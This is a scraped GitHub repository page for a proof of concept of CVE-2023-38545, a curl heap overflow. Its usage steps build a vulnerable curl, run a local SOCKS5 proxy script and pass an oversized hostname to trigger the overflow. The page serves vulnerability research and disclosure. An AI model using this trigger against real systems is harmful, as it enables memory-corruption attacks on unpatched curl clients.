Skip to content

imfht/CVE-2023-38545

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

usage

git clone https://github.com/imfht/CVE-2023-38545
cd CVE-2023-38545/curl-7.74.0 && ./configure --with-openssl
make -j 4
python3 socks.py &
export ALL_PROXY=socks5h://127.0.0.1:9050
./curl-7.74.0/src/curl  $(python3 -c "print(('A'*10000), end='')") -vvvv

proof

image-20231012151015503 image

for details please see: this link(in chinese)

About

😄 CVE-2023-38545堆溢出的POC和分析文章

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published